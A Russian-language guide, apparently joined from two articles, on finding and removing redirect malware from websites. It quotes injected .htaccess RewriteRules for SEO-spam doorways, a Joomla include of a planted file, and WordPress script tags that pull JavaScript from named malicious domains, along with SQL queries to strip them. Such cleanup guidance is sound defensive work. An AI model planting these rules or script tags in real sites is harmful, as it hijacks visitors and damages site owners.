Как найти вирус редирект

Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам – это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов. 

В данной статье я рассмотрю основные варианты встраивания вирусных редиректов. 

Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!

Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.

В первую очередь ищем вставки кода в файлы .htaccess, особенно в корне сайта

Все что связано с Rewrite стоит проверить, куда перенаправляет.

Ниже я приведу пару вредоносных вставок – которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами – тут много названий):

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)%(.*)[0-9]+%[0-9]+%([^d/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^d/]+)[0-9]+%(.*)[0-9]+%[0-9]+%([^d/]+)([^d/]+)%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%(.*)F%(.*)[0-9]+%(.*)[0-9]+%([^d/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%([^d/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+%(.*)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)[0-9]+%([^d/]+)(.*)%(.*)[0-9]+%(.*)[0-9]+%(.*)(.*)%([^d/]+)F%(.*)[0-9]+%[0-9]+%([^d/]+)[0-9]+%(.*)[0-9]+%[0-9]+%[0-9]+([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)(.*)%(.*)[0-9]+%[0-9]+%([^d/]+)[0-9]+%(.*)[0-9]+%[0-9]+%(.*)([^d/]+)%(.*)[0-9]+%(.*)[0-9]+%(.*)([0-9]+)%(.*)[0-9]+%(.*)(.*)%[0-9]+(.*)%(.*)[0-9]+%[0-9]+F%(.*)F%(.*)[0-9]+%[0-9]+%([^d/]+)([0-9]+)%(.*)[0-9]+%[0-9]+%(.*)([^d/]+)%[0-9]+/.*..*$ ?$65$39=$62&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*-.*-F.*-([^d/]+).*-[0-9]+..*$ ?$7$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)([0-9]+)[0-9]+%[0-9]+([^d/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^d/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^d/]+)[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^d/]+)([0-9]+)%[0-9]+([0-9]+)[0-9]+%[0-9]+%[0-9]+([0-9]+)[0-9]+%[0-9]+([^d/]+)-.*-[0-9]+..*$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)-[0-9]+.*[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*[0-9]+N.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+.*[0-9]+F.*W[0-9]+.*[0-9]+.*F[0-9]+ZW.*HR.*(.*)--$ ?$2$10=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*([0-9]+).*L[0-9]+N.*YXJ.*HJ.*WF.*[0-9]+.*Y[0-9]+.*(.*).*R.*Y.*V.*[0-9]+Q.*$ ?$2$1=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*([0-9]+).*L[0-9]+.*[0-9]+.*[0-9]+YW.*[0-9]+.*[0-9]+.*([0-9]+)[0-9]+-$ ?$2$8=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+).*HM[0-9]+L.*[0-9]+.*F[0-9]+ZW.*WF.*[0-9]+.*Y[0-9]+.*(.*).*ZG[0-9]+.*ZXN[0-9]+.*WN.*ZH(.*).*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^d/]+)$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-.*-.*-.*-.*%[0-9]+F$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*%[0-9]+F.*-[0-9]+-.*-.*-.*-.*-.*%[0-9]+F&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)_[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/.*-.*-[0-9]+-.*/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/[0-9]+.*/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+-.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)-.*-V.*%[0-9]+(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/.*-.*-[0-9]+/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)..*&.*=.*:/.*-[0-9]+..*/.*-.*-.*-.*-.*-.*/&.*=[0-9]+K([^d/]+)&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=.*:/.*[0-9]+..*..*..*/.*?.*=OIP.(.*).*U.*[0-9]+.*([0-9]+).*U.*[0-9]+.*[0-9]+V[0-9]+.*Q(.*).*([0-9]+).*&.*=[0-9]+.[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=[0-9]+&.*=%([0-9]+)[0-9]+%(.*)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%[0-9]++%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*&.*=[0-9]+.*[0-9]+.*[0-9]+.*$ ?$148$146=$147&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^d/]+)&.*=[0-9]+&.*=[0-9]+$ ?$11$1=$10&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%.*%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)/.*-.*/[0-9]+/.*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^d/]+)/.*/[0-9]+/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*[0-9]+/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/.*-.*-.*-.*/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/.*[0-9]+/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]++%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)([0-9]+)&.*=-[0-9]+&.*=-[0-9]+$ ?$49$38=$50&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/[0-9]+.*[0-9]+/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/.*/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%.*%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+.*%.*[0-9]+%.*[0-9]+-%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%[0-9]+%.*[0-9]+%.*[0-9]+%.*[0-9]+%.*%.*[0-9]+%[0-9]+%.*[0-9]+%[0-9]+.*/.*/[0-9]+/$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)&.*=-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)&.*=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/[0-9]+%([0-9]+)[0-9]+%[0-9]+.*/$ ?$1$3=$4&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)(.*)[0-9]+%[0-9]+%[0-9]+.*-S.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)(.*)%([0-9]+)[0-9]+%([^d/]+)([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+([^d/]+)/$ ?$15$1=$14&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)%([^d/]+)(.*)%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)([0-9]+)%([0-9]+)[0-9]+%[0-9]+([^d/]+)%([0-9]+)[0-9]+%([^d/]+)[0-9]+-%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%([^d/]+)[0-9]+%([0-9]+)[0-9]+%([^d/]+)F%([0-9]+)[0-9]+%[0-9]+%([0-9]+)[0-9]+%[0-9]+([^d/]+)/$ ?$36$1=$35&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([0-9]+)/([^d/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)-[0-9]+/$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)-.*/?.*=[0-9]+$ ?$1$3=$2&%{QUERY_STRING}[L]

RewriteRule ^([^d/]+)-([0-9]+)-([0-9]+)-.*/$ ?$1$3=$2&%{QUERY_STRING}[L]

Если увидите что-то подобное – смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS – там не будет находиться вирус!

Обычно редиректы прописывают для запросов с мобильных и планшетов:

android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков

как и для переходов с поисковых систем:

yandex|google|mail|rambler|vk.com

Если этот пункт не помог, то стоит обратить внимание на код страницы – порой часто редирект добавляют через Javascript

Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.

Обязательно проверяйте индексные файлы и папку шаблона – это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php – в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require.

Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.

К примеру, в последнее время встречаю не один сайт на джумле ( в частности на Joomla 2.5), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка

require_once($_SERVER["DOCUMENT_ROOT"]."/includes/inc.class.php");

Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php

В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.

Если ваш WordPress сайт взломали и при его открытии происходит редирект на другой сайт, то эта статья для вас. Мы расскажем, как удалить вирус редиректа на WordPress сайте.

На данный момент, вирус редиректа перенаправляет посетителей зараженного WordPress сайта на directednotconverted.ml, lowerbeforwarden.ml, donatelloflowfirstly.ga. Давайте разберемся и удалим это вредоносное перенаправление с вашего сайта.

Данный тип вредоносного ПО вставляет JavaScropt-редирект на каждую страницу и запись сайта. Поэтому, когда посетители заходят на вашу главную страницу или любую другую, они перенаправляются на вредоносный сайт с помощью JavaScript.

• source.lowerbeforwarden.ml.
• scripts.lowerbeforwarden.ml.
• donatelloflowfirstly.ga.
• js.donatelloflowfirstly.ga.
• Source.lowerbeforwarden.ml.
• 0.directednotconverted.ml.
• go.donatelloflowfirstly.ga.

Почему WordPress сайт заражается вирусом редиректа?

Все мы знаем, что WordPress – это самая популярная CMS для ведения блогов. Именно поэтому, WP интересен взломщикам, чтобы распространять свои вирусы и получать из этого выгоду.

Зачастую, вирус на сайт попадает, если вы пользуетесь не лицензионным, взломанным (Nulled) программным обеспечением. Это могут быть плагины, в которых открыт расширенный функционал, либо премиум шаблоны, которые отвязаны от лицензии.

Если вы установили тему из не проверенного источника, то воспользуйтесь плагином проверки на вирусы TOC.

Но вирусы могут попасть на ваш сайт не только из взломанных плагинов или тем. Хакерам также интересны уязвимости в популярных плагинах, ведь их используют миллионы пользователей по всему миру.

Например, недавно была обнаружена уязвимость в плагине WordFence. Да-да, в том плагине, который включает в себя функции защитника от спама, вирусов и атак. Хакеры воспользовались этой уязвимостью и на миллионы сайтов получили вирус с редиректом на другие вредоносные веб-сайты.

Именно поэтому мы рекомендуем всегда обновляться до актуальной версии WordPress, использовать последнии версии плагинов и шаблонов.

Как удалить вирус редиректа с WordPress сайта

Первое, что нужно сделать, это подключиться к своему сайту по FTP или зайди в файловый менеджер на вашем хостинге. Перейдите в папку public_html вашего сайта. Если вы найдете файлы с именами _a , _f , _s, то удалите их, это вредоносное ПО.

Проверьте папку с плагинами и темами, если вы найдете какой-либо неизвестный файл PHP или JavaScript, то удалите этот файл.

Откройте файл index.php, такой файл может находиться в /wp-content/plugins/index.php или public_html/index.php. Найдите в этом файле такой код <script src = ‘*****’ type = ‘text / javascript’> </script>.

Пример:

<script src='https://scripts.lowerbeforwarden.m/src.js?n=n' type='text/javascript'></script>

<script src='https://js.donatelloflowfirstly.g/statistics.js?n=n' type='text/javascript'></script>

Удалите этот код, если вы его найдете. Вы также можете найти этот код в конце каждой вашей страницы или поста в редакторе записей в админке сайта. Также этот код может находиться в шаблонах записей, страниц и index.php.

Откройте phpMyAdmin и выберите свою базу данных. Откройте таблицу wp_post. Отредактируйте любой пост и посмотрите, есть ли этот скрипт или нет.

Чтобы удалить вредоносный код из всех записей на сайте, вам нужно открыть phpMyAdmin и выбрать имя своей базы данных. Далее запустите SQL-запрос, чтобы удалить вредоносный кусок кода. В нашем случае мы нашли 2 вредоносных скрипта:

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns125' type='text/javascript'></script> <script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns125' type='text/javascript'></script>

Чтобы удалить lowerbeforwarden.ml

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts. lowerbeforwarden.ml/src.js?n=ns125' type='text/javascript'></script>", ""));

Чтобы удалить js.donatelloflowfirstly.ga

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns125' type='text/javascript'></script>", ""));

Если вы нашли вредоносный скрипт в вашей записи, то составьте такой же запрос, только замените часть SQL-запроса под нужный вам.

UPDATE wp_posts SET post_content = (REPLACE (post_content, "Вставьте сюда вредоносный скрипт", ""));

Этот запрос будет работать для всех вредоносный запросов. Просто адаптируйте его под себя.

Как удалить вирус редиректа при открытии сайта

Также вирусы с редиректом часто заменяют адрес домашней страницы. Это делают следующие вредоносные сайты:

• donatelloflowfirstly.ga
• 0.directednotconverted.ml

Чтобы это исправить, вам нужно отредактировать поля siteurl и home в таблице wp_options вашей базы данных. Убедитесь, что в этих полях указан адрес вашего домене.

Например, вы можете увидеть на скриншоте ниже, как вредоносный код на сайте заменил адрес сайта и вписал туда адрес вирусного скрипта. Если вы увидите такой скрипт у себя в базе данных – удаляйте его и вписывайте свой адрес сайта.

https://js.donatelloflowfirstly.ga/statistics.js?n=ns2

Проделав все эти действия, вы сможете удалить вирусы directednotconverted.ml и lowerbeforwarden.ml с вашего WordPress сайта.

За основу данной статьи взят данный материал – https://crazytechgo.com.

---

Мы часто видим, как многие пользователи задают нам вопросы по поводу непонятный редиректов на их WordPress сайте. Надеемся, что эта статья помогла вам и в будущем вы больше не столкнетесь с данной проблемой.